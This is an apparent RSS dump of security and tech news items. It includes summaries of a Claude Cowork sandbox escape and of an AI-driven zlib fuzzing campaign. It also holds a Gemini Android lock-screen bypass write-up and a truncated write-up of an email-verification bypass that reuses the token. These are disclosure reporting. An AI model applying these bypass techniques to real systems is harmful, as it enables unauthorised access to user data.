<p>그는 “많은 조직이 AI 에이전트 도입의 기회를 보고 있지만, 이를 하루아침에 실현할 수 있는 일은 아니라는 점도 잘 알고 있다”라며 “CIO는 에이전트가 비즈니스 프로세스 전반에서 작동하도록 해야 하는 경우가 많기 때문에 업무가 어떻게 돌아가는지 전체 흐름을 이해해야 한다. 프로세스를 체계적으로 매핑한 뒤 적절한 지점에 에이전트를 배치해야 한다”라고 설명했다.</p>



<p>즈보로프스카는 효과적인 프로세스 매핑을 위해서는 현재 해당 업무를 수행하는 직원들에 대한 충분한 고려도 반드시 필요하다고 강조했다. AI 도입 이후 직원들이 자신의 역할이 불필요해졌다고 느끼지 않도록 해야 한다는 것이다.</p>



<p>그는 “AI 에이전트를 어떻게 성공적으로 관리할 것인가는 매우 중요한 과제”라며 “새로운 기술을 도입하는 과정에서 직원들이 소외감을 느끼기보다 자신의 역량을 더욱 발휘할 수 있다고 느끼도록 만들어야 한다”라고 말했다.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading">4. 직원들이 단계적으로 AI를 활용하도록 이끌어라</h2>



<p>부동산 전문 기업 세그로(Segro)의 CIO 리처드 코브리지(Richard Corbridge)는 자사가 AI 에이전트 활용 수준을 성숙도에 맞춰 단계적으로 확대하고 있다고 설명했다. 먼저 사람이 의사결정 과정에 참여하는 AI 기반 업무를 도입한 뒤, 이후 사람의 개입을 줄였을 때 발생할 수 있는 위험을 검토하는 방식이다.</p>



<p>코브리지는 이러한 점진적인 접근이 중요한 이유로 거의 모든 기술 제품에 AI 에이전트 기능이 포함되고 있다는 점을 들었다. 그는 마이크로소프트(MS)의 코파일럿을 예로 들며, 세그로 직원 대부분이 생산성 향상을 위해 하루에 최소 10번 이상 코파일럿을 사용한다고 소개했다.</p>



<p>그는 디지털 리더의 역할은 직원들에게 AI 에이전트가 전문가의 가치를 더욱 높여줄 수 있다는 점을 보여주는 것이라고 말했다. 그는 “”우리 회사 한 임원은 코파일럿과 함께 글을 쓰는 경험을 ‘업무를 하는 내내 초지능 동료가 바로 옆에 있는 것과 같다’고 표현했다”라고 설명했다.</p>



<h2 class="wp-block-heading">5. 외부 전문가와 협력하라</h2>



<p>글로벌 콘텐츠·기술 기업 톰슨로이터(Thomson Reuters)의 CTO 조엘 흐론(Joel Hron)은 에이전트형 AI에 대한 신뢰를 높이기 위해 ‘트러스트 인 AI 얼라이언스(Trust in AI Alliance)’ 출범을 지원했다. 이 협의체에는 앤트로픽, AWS, 구글 클라우드(Google Cloud), 오픈AI, 톰슨로이터의 AI 연구 책임자들이 참여해 에이전트형 AI의 신뢰 구축 방안을 논의하고 있다.</p>



<p>흐론은 앞서 AI 기반 법률 리서치 도구 웨스트로 어드밴티지(Westlaw Advantage)와 연구원처럼 정보를 검토하고 전략을 수립하는 딥 리서치 에이전트 개발을 이끌었다. 그는 이러한 경험을 바탕으로 AI 발전을 더욱 가속화하기 위해 협의체 활동에 적극 나서고 있다.</p>



<p>흐론은 “이들 기업의 목표는 AI 모델이 모든 영역에서 인간을 뛰어넘는 성능을 달성하는 것”이라며 “톰슨로이터는 인간의 판단이 요구되는 가장 어려운 문제들을 해결하고 있기 때문에 우리의 업무는 AI 모델의 성능을 가늠하는 중요한 시험대가 된다. 실제로 지난 3년 동안 여러 기업의 AI 모델 평가를 지원해 왔다”라고 설명했다.</p>



<h2 class="wp-block-heading">6. 어려운 질문을 피하지 말아야 한다</h2>



<p>기술 기업 리코 유럽(Ricoh Europe)의 유럽 CIO 닉 피어슨(Nick Pearson)은 디지털 리더가 기술 기업들의 에이전트형 AI 전략을 냉정하게 바라봐야 한다고 조언했다.</p>



<p>그는 “어떤 CIO에게 물어봐도 협업을 제안하는 공급업체가 많다고 말할 것이다. 이는 좋은 일이지만, 동시에 공급업체들은 고객을 자사 생태계에 묶어두려 한다”라며 “디지털 리더는 이러한 관계를 어떻게 관리할지 신중해야 하며, 현재의 업무 방식에 장기간 종속될 수 있는 계약도 다시 검토해야 한다”라고 말했다.</p>



<p>피어슨은 AI 에이전트가 분명한 비즈니스 가치를 창출할 수 있다는 점은 인정하면서도, 일명 FOMO(Fear Of Missing Out) 즉 불안에 휩쓸려서는 안 된다고 강조했다. </p>



<p>그는 “새로운 도구가 단순히 있으면 좋은 기능인지, 기본적으로 갖춰야 하는 기능인지, 아니면 실제로 비즈니스 가치를 창출하는지 냉정하게 판단해야 한다. 지금도 우리는 그런 논의를 계속하고 있다”라고 설명했다.</p>



<h2 class="wp-block-heading">7. 변화에 뒤처지지 말아야 한다</h2>



<p>도요타 유럽(Toyota Motor Europe)의 엔터프라이즈 데이터·애널리틱스 총괄 티에리 마르탱(Thierry Martin)은 CIO가 AI 에이전트 도입에 적극적으로 나서야 한다고 말했다. 생성형 AI인 챗GPT와 코파일럿(Copilot)도 반복적인 업무를 줄여주지만, AI 에이전트는 그보다 훨씬 더 큰 가치를 제공할 수 있다는 설명이다.</p>



<p>도요타 유럽 직원들은 스노우플레이크 인텔리전스(Snowflake Intelligence) 에이전트를 활용해 자연어로 기업 내 지식을 검색하고 활용한다. 각 사업부(LOB) 직원들은 이 기술을 이용해 지역별 차량 사양 수요를 분석하는 등 필요한 인사이트를 이전보다 훨씬 빠르게 도출하고 있다.</p>



<p>마르탱은 이러한 성과에 만족감을 나타내며 다른 디지털 리더들도 가능한 한 빨리 AI 에이전트를 시험해봐야 한다고 권했다. 그는 “가장 중요한 것은 AI를 이해하고 한발 앞서 나가는 것이다. 그것이 성공의 핵심이다. 변화의 속도는 앞으로도 계속 빨라질 것이기 때문이다”라고 설명했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Cowork Sandbox Flaw Lets Attackers Execute Commands as Root in Hyper-V VM]]></title>
<description><![CDATA[A newly disclosed sandbox escape technique in Anthropic’s Claude Cowork for Windows illustrates how attackers can achieve root-level command execution inside a Hyper-V–isolated Ubuntu virtual machine (VM) by exploiting design vulnerabilities in CoworkVMService and its Remote Procedure Call (RPC) ...]]></description>
<link>https://tsecurity.de/de/3642767/it-security-nachrichten/claude-cowork-sandbox-flaw-lets-attackers-execute-commands-as-root-in-hyper-v-vm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642767/it-security-nachrichten/claude-cowork-sandbox-flaw-lets-attackers-execute-commands-as-root-in-hyper-v-vm/</guid>
<pubDate>Fri, 03 Jul 2026 07:35:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed sandbox escape technique in Anthropic’s Claude Cowork for Windows illustrates how attackers can achieve root-level command execution inside a Hyper-V–isolated Ubuntu virtual machine (VM) by exploiting design vulnerabilities in CoworkVMService and its Remote Procedure Call (RPC) interface. This issue, documented by researcher Nick McClendon from Armadin, highlights weaknesses in the interaction between […]</p>
<p>The post <a href="https://gbhackers.com/claude-cowork-sandbox-flaw/">Claude Cowork Sandbox Flaw Lets Attackers Execute Commands as Root in Hyper-V VM</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Don’t kill music’: Anthony Albanese’s favourite bands beg PM to stop AI companies from stealing their work]]></title>
<description><![CDATA[A potential deal with the government would allow international tech companies to mine the creative work of Australian musicians. Some of the prime minister’s favourite artists told the Guardian how they feel about itCreatives sound alarm on copyright as Pocock calls $50bn datacentre proposal ‘ult...]]></description>
<link>https://tsecurity.de/de/3642551/ai-nachrichten/dont-kill-music-anthony-albaneses-favourite-bands-beg-pm-to-stop-ai-companies-from-stealing-their-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642551/ai-nachrichten/dont-kill-music-anthony-albaneses-favourite-bands-beg-pm-to-stop-ai-companies-from-stealing-their-work/</guid>
<pubDate>Fri, 03 Jul 2026 03:48:01 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A potential deal with the government would allow international tech companies to mine the creative work of Australian musicians. Some of the prime minister’s favourite artists told the Guardian how they feel about it</p><ul><li><p><a href="https://www.theguardian.com/australia-news/2026/jul/01/australia-ai-copyright-laws-creatives-sound-alarm-albanese-government-datacentres">Creatives sound alarm on copyright as Pocock calls $50bn datacentre proposal ‘ultimate dirty deal’</a></p></li></ul><p></p><p>Big tech companies are asking for Australian copyright laws to be watered down, to allow them to scrape Australian output – including journalism, music and books – in order to improve their AI models.</p><p>Guardian Australia this week reported on an industry proposal under which companies would commit more than $50bn in investment in datacentres and set up a $350m fund to compensate creatives in exchange for weaker copyright laws. Senator David Pocock has described it as <a href="https://www.theguardian.com/australia-news/2026/jul/01/australia-ai-copyright-laws-creatives-sound-alarm-albanese-government-datacentres">the “ultimate dirty deal”</a>.<br><br>
 The Albanese government has insisted it has no plans to weaken copyright protections, after ruling out the potential text and data mining exemption last year – but creatives are sounding the alarm. Loudest among them this week are musicians, some of whom discovered last month that <a href="https://www.theguardian.com/culture/2026/jun/26/australian-musicians-aussie-music-ai-training-tool-nick-cave-kylie-minogue-paul-dempsey">their work was already being scraped</a>.<br><br>
 Albanese is known for his love of Australian music. Guardian Australia spoke to some of his favourite bands to hear what they had to say to him.</p> <a href="https://www.theguardian.com/music/2026/jul/03/dont-kill-music-anthony-albaneses-favourite-bands-beg-pm-to-stop-ai-companies-from-stealing-their-work">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia recruits longtime Microsoft sales leader Nick Parker with $40M+ pay package]]></title>
<description><![CDATA[Nick Parker, a 26-year Microsoft veteran who led its worldwide commercial sales business, is joining Nvidia as executive vice president of worldwide field operations, succeeding retiring sales chief Jay Puri. A regulatory filing details a pay package that includes a $5 million signing bonus and e...]]></description>
<link>https://tsecurity.de/de/3642143/it-nachrichten/nvidia-recruits-longtime-microsoft-sales-leader-nick-parker-with-40m-pay-package/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642143/it-nachrichten/nvidia-recruits-longtime-microsoft-sales-leader-nick-parker-with-40m-pay-package/</guid>
<pubDate>Thu, 02 Jul 2026 21:47:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1195" height="797" src="https://cdn.geekwire.com/wp-content/uploads/2026/07/Computex_nick-parker.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/07/Computex_nick-parker.jpg 1195w, https://cdn.geekwire.com/wp-content/uploads/2026/07/Computex_nick-parker-768x512.jpg 768w" sizes="(max-width: 1195px) 100vw, 1195px"><br>Nick Parker, a 26-year Microsoft veteran who led its worldwide commercial sales business, is joining Nvidia as executive vice president of worldwide field operations, succeeding retiring sales chief Jay Puri. A regulatory filing details a pay package that includes a $5 million signing bonus and equity grants targeted at $40 million. <a href="https://www.geekwire.com/2026/nvidia-recruits-longtime-microsoft-sales-leader-nick-parker-with-40m-pay-package/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Field reports from Patch the Planet]]></title>
<description><![CDATA[We’re running Patch the Planet, an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose ...]]></description>
<link>https://tsecurity.de/de/3640928/it-security-nachrichten/field-reports-from-patch-the-planet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640928/it-security-nachrichten/field-reports-from-patch-the-planet/</guid>
<pubDate>Thu, 02 Jul 2026 13:23:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We’re running <a href="https://trailofbits.com/patch-the-planet">Patch the Planet</a>, an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose of bug reports, and OSS maintainers are already spread thin. Our plan is to point OpenAI’s latest models at real codebases, find the security bugs first, work with maintainers to patch them, and find ways to decrease the burden on maintainers in the long run.</p>
<p>This post compiles field reports from Patch the Planet. We’ll update it as the initiative progresses with insights on model capabilities, bespoke tooling for maintainers, and industry guidance. Follow this blog for updates.</p>
<h2>Field report 1: GPT-5.5-Cyber built a custom fuzzing harness for zlib</h2>
<p><em>Authored by <a href="https://blog.trailofbits.com/authors/benjamin-samuels/">Benjamin Samuels</a></em></p>
<p>The expertise barrier that kept bespoke fuzzing campaigns out of reach for most attackers is gone. <strong>We watched GPT-5.5-Cyber build in a single day what would have taken weeks for a skilled security researcher</strong>: harnesses across a dozen entrypoints, sanitizer and variant builds, seeds, and multiple findings currently undergoing coordinated disclosure.</p>
<p>This particular instance focused on <a href="https://github.com/madler/zlib">zlib</a>, a widely used data format and lossless data compression software library. We pointed GPT-5.5-Cyber at the library and drove it through Codex with the <code>/goal</code> command, asking it to find a specific class of bugs that are critically dangerous in compression libraries. We’ll publish the full harness and findings for inspection once the vulnerabilities are patched and a new release is cut.</p>
<h3>The lab GPT-5.5-Cyber built in a day</h3>
<p>We didn’t tell the model how to find these bugs. The obvious first move is to read the source code, but zlib has been reviewed so thoroughly that there’s little left to find that way. GPT-5.5-Cyber worked that out for itself, judged static review to be a poor use of tokens, and decided the higher value path was to build fuzz tooling to dynamically test the code. Earlier models given the same goal tend to read the code and flag whatever looks suspicious, ultimately leading to mediocre outcomes.</p>
<p>We believe the frontier 5.5-Cyber model combined with the <code>/goal</code> feature is what let it execute end-to-end without hand-holding. <code>/goal</code> forced the objective to live across multiple turns and compactions so the model held scope, and 5.5-Cyber was smart enough to reject weak findings, expand coverage when a line of investigation died, and keep running until it had workable proof-of-concepts backed by sanitizer output.</p>
<p>Over the next several hours, it built the campaign out one piece at a time:</p>
<ul>
<li>It used ASan and UBSan builds so memory errors became observable.</li>
<li>It repurposed existing edge-case tests as guidance for the fuzz seed corpus.</li>
<li>It wrote C/C++ harnesses across a dozen entrypoints, including inflate, inflateBack, uncompress2, gzFile, MiniZip, puff, blast, infback9, gzjoin, gzappend, and several contrib stream wrappers.</li>
<li>It used compile-time variant builds (<code>INFLATE_STRICT</code>, <code>BUILDFIXED</code>, <code>PKZIP_BUG_WORKAROUND</code>, etc.) to reach code that the default zlib build hides.</li>
</ul>
<p>Each of these decisions is routine on its own, but stringing them together in the right order across a dozen entrypoints, without being handed the steps, is a relatively large shift in how capable frontier models are.</p>
<p>While zlib already has fuzzing coverage from its OSS-Fuzz harness, GPT-5.5-Cyber went beyond the default harness shape, which passes random inputs to the gz* APIs. Instead of directly fuzzing the gz* APIs, its most successful harness found bugs in valid gz* states that could only be constructed by operating system backpressure.</p>
<h3>Reporting discipline is the hard part</h3>
<p>In general, models tend to struggle with deciding when a finding is severe enough to justify escalating it into reporting. Weaker models tend to escalate bugs that cause the program to crash, but are not reachable under real-world conditions. Early on, GPT-5.5-Cyber hit a null callback crash in <code>inflateBack</code>. The crash was real, but reaching it required a caller to set up a state that was extraordinarily unlikely in real-world conditions, so the model logged it as unreachable and moved on. This agent kept going without human intervention and found several higher-impact issues.</p>
<p>That discipline is the whole game. The value of the zlib harness came from automation plus <strong>a strict definition of what counted as a reportable finding</strong>. Without strong validity rules baked into the goal and a model truly capable of evaluating those rules, the agent will generate mountains of noise with high confidence: invalid uses of the public API, expected parser errors, internal API misuse, etc.</p>
<h3>The moat is gone</h3>
<p>Setting up a bespoke fuzzing campaign used to mean finding someone who could write harnesses, reason about valid API state, and differentiate between a bug and a crash that can’t happen in practice. This asymmetry kept casual attackers out of the game for most targets.</p>
<p>That moat is mostly gone now, and it shifts the threat model in two directions at the same time. For a skilled researcher, it is a force multiplier: the weeks-long tax on every new target drops to a day or less, so the same person can audit far more code. For a low-skill attacker, the floor rises: the tedious, expertise-heavy work of getting a harness off the ground can now be driven by starting a goal and supervising the loop.</p>
<p>For anyone shipping security-critical code, the practical takeaway is clear. Bespoke fuzzing is no longer a luxury reserved for projects with mature OSS-Fuzz coverage, and it is no longer expensive for the people whom you would rather not have running it. The defensive move is to do it first, with the validity rules that turn agent output into a high-signal source you can act on.</p>
<h3>Lessons learned</h3>
<p>The fuzzing lab answered the question we came in with and left us a much bigger one. We didn’t ask GPT-5.5-Cyber to build a fuzzing campaign; it decided that was the job and did it. The thing worth watching for now is what else these new models will reach for once you hand them a goal and step back, especially the approaches we would never have thought to ask for before.</p>
<p>That is also why the front-running work being done by Patch the Planet matters. Every new capability that helps us find bugs faster is just as available to an attacker, so the advantage goes to whoever finds the bugs and fixes them first.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Opinion: Governor’s new economic council snubs startups, forgets AI]]></title>
<description><![CDATA[Seattle angel investor Charles Fitzgerald argues that Gov. Bob Ferguson's new Economic Development Council is backward-looking, lacks startup and VC representation, and ignores AI — the single biggest force shaping Washington's economy. Read More]]></description>
<link>https://tsecurity.de/de/3639019/it-nachrichten/opinion-governors-new-economic-council-snubs-startups-forgets-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639019/it-nachrichten/opinion-governors-new-economic-council-snubs-startups-forgets-ai/</guid>
<pubDate>Wed, 01 Jul 2026 18:03:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="999" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/ferguson-1260x999.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/ferguson-1260x999.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/ferguson-768x609.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/ferguson.jpg 1411w" sizes="auto, (max-width: 1260px) 100vw, 1260px"><br>Seattle angel investor Charles Fitzgerald argues that Gov. Bob Ferguson's new Economic Development Council is backward-looking, lacks startup and VC representation, and ignores AI — the single biggest force shaping Washington's economy. <a href="https://www.geekwire.com/2026/opinion-governors-new-economic-council-snubs-startups-forgets-ai/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AirDrop and Quick Share Flaws Expose Five Billion Devices to Proximity Attacks]]></title>
<description><![CDATA[Newly disclosed flaws in Apple’s AirDrop and Google/Samsung’s Quick Share allow attackers within range to repeatedly and remotely crash or manipulate nearby devices without user interaction. Arxiv reports that a team from CISPA Helmholtz Center for Information Security carried out a systematic re...]]></description>
<link>https://tsecurity.de/de/3638582/it-security-nachrichten/airdrop-and-quick-share-flaws-expose-five-billion-devices-to-proximity-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638582/it-security-nachrichten/airdrop-and-quick-share-flaws-expose-five-billion-devices-to-proximity-attacks/</guid>
<pubDate>Wed, 01 Jul 2026 14:54:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Newly disclosed flaws in Apple’s AirDrop and Google/Samsung’s Quick Share allow attackers within range to repeatedly and remotely crash or manipulate nearby devices without user interaction. Arxiv reports that a team from CISPA Helmholtz Center for Information Security carried out a systematic reverse-engineering and protocol-aware fuzzing investigation of both proximity-sharing stacks across macOS, iOS, Android, […]</p>
<p>The post <a href="https://cyberpress.org/airdrop-and-quick-share-flaws/">AirDrop and Quick Share Flaws Expose Five Billion Devices to Proximity Attacks</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App]]></title>
<description><![CDATA[Image generated by Google GeminiNOTE: As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.Introduction: “Security Architecture vs. The Real World”How can Android’s foundational sec...]]></description>
<link>https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9_XxbXU5gPX6wrq251_tIg.png"><figcaption>Image generated by Google Gemini</figcaption></figure><p><strong>NOTE:</strong> <em>As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.</em></p><h3>Introduction: “Security Architecture vs. The Real World”</h3><p>How can Android’s foundational security layer, the Keyguard, falter when confronted with the complexity of a modern AI interface? The answer is simple: as systems grow more complex, the impact of overlooked edge cases amplifies.</p><p>In this write-up, I will dissect how a simple multi-touch interaction triggered a critical logical security flaw. I’ll provide the technical details of how this vulnerability bypassed the lock screen — the very boundary designed to be the most secure — and exposed sensitive user data.</p><h3>How I Discovered It</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/426/1*bfiQwfzmzuTXg4qGaLwLKA.gif"><figcaption><strong>Fig 1: </strong>Demonstration of the Multi-touch Bypass</figcaption></figure><p>I didn’t uncover this vulnerability using automated scanning utilities or complex fuzzing frameworks; rather, it surfaced organically during my daily user experience. I noticed that multi-finger interactions within the user interface triggered benign functions that should have been restricted under specific device states. While an average user might dismiss this behavior as a transient UI glitch, to a security researcher, it signaled a potential flaw.</p><p>Further analysis revealed that invoking specific operational modes, such as Lyria or Deep Research, forced the application into a full-screen state. Initially, interaction was restricted, and the system prompted for credentials. However, applying the multi-touch technique I discovered earlier circumvented these constraints, granting unauthorized access to application settings and chat histories. By expanding the attack surface during my research, I confirmed that critical assets like NotebookLM notebooks and Gmail drafts were equally vulnerable, subsequently documenting and escalating these findings to Google.</p><h3>Technical Analysis</h3><p>Gemini’s modular features bypassed the system Keyguard due to an architectural misconfiguration. The application improperly exposed UI elements that should remain strictly inaccessible while the device is locked. Although the system repeatedly invoked the Keyguard to request authentication during these operations, I successfully bypassed the lock state by leveraging a form of <strong>Context Hijacking</strong>.</p><p>The root cause lies in inadequate validation of concurrent UI interactions. By maintaining an active press on a permitted interaction area (such as a text input field) while simultaneously tapping a restricted target element, the application failed to isolate the input contexts. This race-like UI interaction completely neutralized the application’s internal security control mechanisms, turning a seemingly minor interface bug into a robust logical bypass.</p><a href="https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href">https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href</a><h4><strong>Impact &amp; Exploitation Surface</strong></h4><p>During the initial phase of my research, the exploit vectors were limited to reading, deleting, or renaming historical chats, accessing Gemini’s core settings, and viewing profile data. However, digging deeper into the application’s ecosystem revealed a significantly more severe impact:</p><ul><li><strong>Arbitrary Creation of Gmail and Google Docs Drafts:</strong> Allowing unauthenticated data injection into core Google services.</li><li><strong>Unauthorized Access to NotebookLM:</strong> Exposing proprietary or highly sensitive personal and enterprise data stored within notebooks.</li><li><strong>Gem Execution:</strong> Triggering custom AI agents without owner authentication.</li><li><strong>Destructive Actions:</strong> Permanently deleting critical NotebookLM assets.</li></ul><p>The practical implications of this vulnerability present severe risks, including data exfiltration, advanced social engineering scenarios via unauthorized draft creation, and the compromise of enterprise-grade environments.</p><h3>Coordination and Disclosure Timeline</h3><p>Throughout the lifecycle of this vulnerability, I maintained an active and transparent line of communication with Google’s security team. Shortly after submission, my report was designated as a <strong>“Duplicate,”</strong> tied to an older legacy issue inherent to Android’s core component architecture. Despite my requests for verification regarding the unique interaction vector, the root cause was maintained as identical.</p><p>Nevertheless, I continued my research. Following a subsequent major Gemini update, I verified that the exploit remained active. Upon presenting this evidence, an immediate mitigation was deployed, removing the specific mode buttons from the locked interface. Roughly a month later, a comprehensive patch was pushed, completely resolving the underlying logic flaw. My subsequent regression testing confirmed that unauthorized multi-touch access had been completely mitigated, successfully concluding the lifecycle of the report.</p><h3>Key Takeaways and Conclusion</h3><p>This journey marked my very first experience within the bug bounty ecosystem. Uncovering this logical vulnerability taught me that security research extends far beyond hunting for code flaws; it is about navigating the disclosure process and understanding how even a “duplicate” report can be leveraged to harden a system’s overall security posture. It perfectly illustrated how seemingly decoupled, non-critical components can be chained together to form a high-severity exploit.</p><p>Analyzing Android’s security architecture and engaging with engineering teams on regression analysis during my first research attempt fundamentally shifted my perspective on information security. While this specific report did not yield a financial bounty, the true payout was invaluable: a deep dive into the inner workings of complex enterprise software and the discipline required to execute a responsible disclosure process.</p><p>This experience is merely the opening chapter of my career in security research. It stands as a reminder that no architecture is infallible, but through the vigilance of independent researchers, they can be made resilient. Security is never a static defense; it is a continuous cycle of curiosity, analysis, and refinement.</p><p><strong>NOTE:</strong> All PoC media provided in this article have been redacted to ensure user privacy and are presented solely for educational and security analysis purposes.</p><h3>📌 References &amp; Community</h3><p>If you want to check out my other security research, tools, or open-source projects, feel free to explore the links below:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/msalihberk/">github.com/msalihberk</a></li><li><strong>Previous Research:</strong> <a href="https://medium.com/meetcyber/shadowlab-a-modular-c2-framework-architecture-built-with-python-for-modern-cybersecurity-research-7acb496e6784">ShadowLab: A Modular C2 Framework Architecture Built with Python for Modern Cybersecurity Research</a></li><li><strong>Follow for More:</strong> Feel free to follow my Medium profile to get notified about my future security research, development projects, and technical write-ups.</li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9e7da290ea06" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/gemini-app-logical-lockscreen-bypass-9e7da290ea06">Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Found an Email Verification Bypass on an AI Freelance Platform]]></title>
<description><![CDATA[A simple implementation flaw allowed email verification to be completed without ever opening the verification email.A few weeks ago, I was browsing LinkedIn looking for freelance opportunities when I came across an AI-powered platform looking for freelancers. The platform looked interesting, so I...]]></description>
<link>https://tsecurity.de/de/3638143/hacking/how-i-found-an-email-verification-bypass-on-an-ai-freelance-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638143/hacking/how-i-found-an-email-verification-bypass-on-an-ai-freelance-platform/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>A simple implementation flaw allowed email verification to be completed without ever opening the verification email.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CW9tvPsJWDyi2UjzsWgWrw.png"></figure><p>A few weeks ago, I was browsing LinkedIn looking for freelance opportunities when I came across an AI-powered platform looking for freelancers. The platform looked interesting, so I decided to create an account and see how everything worked.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MNhizafyQtUILtUQgezQyA.png"></figure><p>This wasn’t a bug hunting session. I was simply signing up as a normal user.</p><p>That said, I have one habit that’s hard to get rid of.</p><p>Whenever I register on a new website, I usually keep Chrome DevTools open and watch the network traffic. It’s something I’ve been doing for years, partly out of curiosity and partly because it helps me understand how an application is built.</p><p>Sometimes I don’t find anything interesting.</p><p>Sometimes I learn how the application works.</p><p>And occasionally… I find something the developers didn’t intend.</p><p>This turned out to be one of those occasions.</p><h3>Responsible Disclosure</h3><p>Before we dive into the technical details, here’s a quick note.</p><p>I responsibly reported this issue to the platform’s security team. The report was acknowledged, and the issue has since been fixed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AWDt_XKRS0ZbQG2Eh7Ad9g.png"></figure><p>To avoid exposing the affected platform, I’ve redacted its name, domain, screenshots, and any other identifying information throughout this article.</p><p>Interestingly, while investigating this issue, I also came across another security weakness. That’s a story for another day.</p><h3>Looking at the Registration Flow</h3><p>For the registration, I used a temporary email address. I usually do this when trying a new service, especially if I’m not sure whether I’ll continue using it.</p><p>Before clicking <strong>Sign Up</strong>, I opened Chrome DevTools and switched to the <strong>Network</strong> tab.</p><p>More specifically, the <strong>Fetch/XHR</strong> requests.</p><p>Once the registration completed, I started reviewing the requests and responses generated by the application.</p><p>Most of the traffic looked exactly as I’d expect.</p><p>The registration request returned basic account information, a few status fields, and something else.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jePDREH7QwX833iROG4SFQ.png"></figure><p>The token value was clearly a JWT.</p><p>At this point, nothing looked particularly suspicious.</p><p>Many modern applications automatically authenticate users immediately after registration, so returning a JWT isn’t unusual. Depending on the application’s architecture, it can be a perfectly valid design choice.</p><p>I simply made a mental note of it and continued observing the registration flow.</p><p>A few seconds later, the verification email arrived.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u05oGKYBpi6Stva4kgRCjA.png"></figure><p>Like most verification emails, it contained a button that pointed to a URL similar to this:</p><pre>https://[REDACTED]/verify-email?token=&lt;JWT&gt;</pre><p>Again, nothing unusual.</p><p>Until I looked a little closer.</p><p>The token inside the verification URL looked very familiar.</p><p>I went back to the registration response, copied both values, and compared them.</p><p>They were exactly the same.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SuJlBhZftbGoHJzkrp2sVQ.png"></figure><p>That immediately raised a simple question.</p><blockquote><strong><em>If I already have this token from the registration response, do I actually need the verification 